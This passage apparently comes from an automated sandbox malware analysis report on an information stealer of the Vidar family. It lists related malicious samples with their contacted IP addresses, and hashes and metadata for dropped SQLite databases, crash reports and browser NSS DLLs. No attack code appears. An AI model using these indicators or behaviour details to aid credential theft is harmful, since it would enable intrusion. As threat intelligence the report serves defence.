                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19DHL INVOICE DOCUMENT NOTIFICATION 202403286777373688_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          inpau292101.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          SecuriteInfo.com.FileRepMalware.14270.3068.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          SecuriteInfo.com.FileRepMalware.14270.3068.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          dVX6r5CyYY.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          awb_shipping_doc_23642.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          TOMBIG - 9004898 - Ponuka#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\freebl3.dll | OJP7vrLRNG.exe | Get hash | malicious | Mars Stealer, Stealc, Vidar | Browse |
 | GqMyzGzrFq.exe | Get hash | malicious | Mars Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | Vidar | Browse |
 | z5uPcOrP22.exe | Get hash | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse |
 | BuThoFHNNK.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | Browse |
 | 6uVlPQSJ4e.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | Browse |
 | file.exe | Get hash | malicious | Vidar | Browse |
 | i1crvbOZAP.exe | Get hash | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | Browse |
 | yU3icg18lq.exe | Get hash | malicious | Vidar | Browse |
 | EcNghZJd5O.exe | Get hash | malicious | Vidar | Browse |
C:\ProgramData\mozglue.dll | OJP7vrLRNG.exe | Get hash | malicious | Mars Stealer, Stealc, Vidar | Browse |
 | GqMyzGzrFq.exe | Get hash | malicious | Mars Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | Vidar | Browse |
 | z5uPcOrP22.exe | Get hash | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | Browse |
 | BuThoFHNNK.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | Browse |
 | 6uVlPQSJ4e.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | Browse |
 | file.exe | Get hash | malicious | Vidar | Browse |
 | i1crvbOZAP.exe | Get hash | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | Browse |
 | yU3icg18lq.exe | Get hash | malicious | Vidar | Browse |
 | EcNghZJd5O.exe | Get hash | malicious | Vidar | Browse |
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):0.9088142992364229
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:N0+dcBoTzvyP4Gic0BU/fIxaGszuiFUZ24IO8EB:W9qyniXBU/iadzuiFUY4IO8I
                                                                                                                                                                                                                                                  MD5:0F5BEEB1C5B0E46E11810B12F6A3FD40
                                                                                                                                                                                                                                                  SHA1:E4E01160528A8D544B0371C07C21C0D133AE04BA
                                                                                                                                                                                                                                                  SHA-256:1ED7B1E36C702E71E7C386CE8C82E4E265329C72F14E54CE4EC90544ADC7F2A3
                                                                                                                                                                                                                                                  SHA-512:60C6D7B58D5B3476E3AD29253698AC5014C23A08FA8BB90D29AB91842EAD6D0B1CEC0D98289AFED2930035407E0BF48F66D2E2128DD66F7E8297B0994578C368
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.1.8.4.0.7.0.5.3.3.1.3.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.1.8.4.0.7.1.1.5.8.1.3.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.d.7.7.4.b.4.-.4.f.7.f.-.4.2.4.b.-.b.9.7.7.-.9.0.9.a.c.e.4.d.f.b.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.7.4.7.0.3.b.-.8.d.0.5.-.4.6.c.c.-.9.1.6.2.-.0.4.2.b.7.e.9.8.9.4.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.r.i.e.n.d.l.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.0.-.0.0.0.1.-.0.0.1.4.-.2.5.b.2.-.5.c.5.6.c.9.8.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.2.e.d.b.6.b.b.5.1.0.7.3.7.a.9.b.2.c.c.e.f.6.c.d.6.d.4.4.2.0.0.0.0.0.0.0.0.!.0.0.0.0.7.1.8.8.2.b.b.0.2.d.1.f.a.7.b.4.a.0.f.8.2.4.a.f.d.c.c.1.c.d.5.3.b.d.b.8.5.b.a.1.!.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Mar 29 11:07:50 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):174462
                                                                                                                                                                                                                                                  Entropy (8bit):3.9272227368226966
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:sa/IuBojRypN4uE2aOHJOl9RLTgnSVXlGAjTgYd0CDUtTb0HTCP:sa0U4uEqHJGLTgnytTvub
                                                                                                                                                                                                                                                  MD5:3EA1B5B50FA4D8D06095DB0E7401D811
                                                                                                                                                                                                                                                  SHA1:8BD82C92DFCAC5D04825D14631EDC8BAF2C5732E
                                                                                                                                                                                                                                                  SHA-256:F4438F9A3BE0E1D0F0C267F0AC8175092A1D704F9319D1A0EF38E0BF09DCE87B
                                                                                                                                                                                                                                                  SHA-512:3FE4E45DF3E9174E568B4F633AA3477E0AA5412D11FED934AAB05BE6B32F8B44E8A7987D6827BC519E917438CCD5B49DCE9CABD9EBB892A49C7D2161B4DD949E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8310
                                                                                                                                                                                                                                                  Entropy (8bit):3.700225780508715
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ6CjS6I6Y9ASUAOSeOgmfBW4JWprB89bnsssfS9Km:R6lXJdS6I6YKSUPSeOgmfc4JNns/fc7
                                                                                                                                                                                                                                                  MD5:EC6BE54A124EAC8A08055E6B28C4A3A6
                                                                                                                                                                                                                                                  SHA1:4473AA342B7CA1AC63A0D020F4F7C46A751061E3
                                                                                                                                                                                                                                                  SHA-256:131D5D069B0215024A0952AA47841DC47335AA1DE71DFA761BC14E72874D6049
                                                                                                                                                                                                                                                  SHA-512:4C6F6367732B5E2E8CE06EB8FD94EF9D3B58DFF92073E9B3BF2295D39B89FCE7E87402BD6D54E661669360CCA665371C55100E0E3C0570D560D5DEC4A8A803CB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.2.<./.P.i.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4628
                                                                                                                                                                                                                                                  Entropy (8bit):4.455426325382966
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsEJg77aI9XIVWpW8VY6Ym8M4JoAFg+q8o3HAX/Y3/Gd:uIjfCI7VV7VeJU1HAX/Y3ud
                                                                                                                                                                                                                                                  MD5:30B77BC9DEA1972DA118C47A1FAB24AD
                                                                                                                                                                                                                                                  SHA1:5E26B2249339EEF0DFEE21C02FA0C2AB58A1D285
                                                                                                                                                                                                                                                  SHA-256:AC97B7F338D322BEB3D0E631B58EAF5C9DFD2FB8E74325F72B5D81F95DC956A4
                                                                                                                                                                                                                                                  SHA-512:4B856C7972752419CDBB816E5B93E2BD007753109157EED8D57E3AD64D46E482D64630BDDF255D0D816C910E179297A287FC830DADD3C19FC62ADB26E116FC5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="256450" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                  Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: OJP7vrLRNG.exe, Detection: malicious
• Filename: GqMyzGzrFq.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: z5uPcOrP22.exe, Detection: malicious
• Filename: BuThoFHNNK.exe, Detection: malicious
• Filename: 6uVlPQSJ4e.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: i1crvbOZAP.exe, Detection: malicious
• Filename: yU3icg18lq.exe, Detection: malicious
• Filename: EcNghZJd5O.exe, Detection: malicious
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                  Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: OJP7vrLRNG.exe, Detection: malicious
• Filename: GqMyzGzrFq.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: z5uPcOrP22.exe, Detection: malicious
• Filename: BuThoFHNNK.exe, Detection: malicious
• Filename: 6uVlPQSJ4e.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: i1crvbOZAP.exe, Detection: malicious
• Filename: yU3icg18lq.exe, Detection: malicious
• Filename: EcNghZJd5O.exe, Detection: malicious
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
